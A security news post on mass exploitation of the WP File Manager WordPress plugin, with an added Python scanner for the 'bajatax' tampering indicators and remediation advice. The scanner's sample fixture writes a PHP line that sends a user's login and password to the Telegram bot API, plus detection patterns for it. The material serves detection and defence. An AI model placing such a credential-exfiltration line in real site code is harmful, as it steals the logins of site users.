Last week, a flaw in the WP File Manager plugin for WordPress was discovered being abused in the wild. It was quickly reported and patched by the developers the same day. Fast forward one week and, as of yesterday, over 2.6 million sites have been hit by attempts to exploit this plugin before site administrators could update. At least one successful attacker has been modifying the vulnerable file to lock out competing exploit attempts, also adding $content="by bajatax" to the code. At least one other actor has been identified exploiting the plugin as well, recognizable by a consistent password hash used to lock out other exploitation attempts. Once a site has been infected, "bajatax" uses the Telegram API to exfiltrate the credentials of any user who logs in to the site.
Wordfence has published several indicators of compromise (IOCs) to look for. Any WordPress administrator using the WP File Manager plugin should check their installation for these IOCs and update to the latest version of the plugin immediately. As the high volume of attacks in such a short time shows, WordPress plugins are a highly sought-after target for compromise.
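As an added example (not code from the original post, and not Wordfence's own IOC list), the following Python scanner walks a WordPress tree and flags PHP files carrying the one indicator the post does name, the $content="by bajatax" tag. It also applies an assumed heuristic, a reference to api.telegram.org in plugin code, based only on the post's statement that the attacker exfiltrates credentials over the Telegram API. The directory layout, file names and file contents in build_sample_tree() are constructed for this example, not captured from a real compromise.

```python
"""Scan a WordPress install for the WP File Manager tampering indicators described above.

Added example, not from the original post or from Wordfence. The only indicator
taken from the post is the string $content="by bajatax"; the api.telegram.org
check is an assumed heuristic derived from the post's mention of the Telegram API.
"""
import os
import re
import tempfile

# Indicator patterns: (label, compiled regex). Order determines the order of reported hits.
IOC_PATTERNS = [
    # From the post: the attacker tags the modified file with this assignment.
    ("bajatax_tag", re.compile(r'\$content\s*=\s*["\']by bajatax["\']')),
    # Assumed heuristic: a file-manager plugin has no legitimate reason to call Telegram's bot API.
    ("telegram_api", re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)),
]


def scan_file(path):
    """Return the labels of every IOC pattern found in one file (empty list if clean/unreadable)."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            data = fh.read()
    except OSError:
        return hits
    for label, pattern in IOC_PATTERNS:
        if pattern.search(data):
            hits.append(label)
    return hits


def scan_for_iocs(root, extensions=(".php",)):
    """Walk `root` and return {relative_path: [labels]} for every file with at least one hit."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_tree():
    """Construct a throwaway plugin directory with one clean and one tampered PHP file.

    The layout below assumes the usual wp-content/plugins/<slug> convention; the
    plugin slug, file names and contents are made up for this example.
    """
    root = tempfile.mkdtemp(prefix="wpfm_")
    plugin = os.path.join(root, "wp-content", "plugins", "wp-file-manager", "lib", "php")
    os.makedirs(plugin)
    # Clean file: assigns $content from a legitimate source, no Telegram reference.
    with open(os.path.join(plugin, "clean.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$content = file_get_contents($path);\necho $content;\n")
    # Tampered file: carries the tag from the post and a constructed exfiltration call.
    with open(os.path.join(plugin, "tampered.php"), "w", encoding="utf-8") as fh:
        fh.write(
            "<?php\n"
            "$content=\"by bajatax\";\n"
            "file_get_contents('https://api.telegram.org/botTOKEN/sendMessage?text=' . $u . ':' . $p);\n"
        )
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel_path, labels in scan_for_iocs(sample_root).items():
        print(f"{rel_path}: {', '.join(labels)}")
```

To check a live site, call scan_for_iocs() on the document root (for example scan_for_iocs("/var/www/html")) rather than on the sample tree. A hit means the plugin files have been altered: replace the plugin with a clean copy of the patched release rather than editing the tagged file, and, because the post states that credentials of anyone logging in were being exfiltrated, reset the passwords of every account that authenticated while the site was infected.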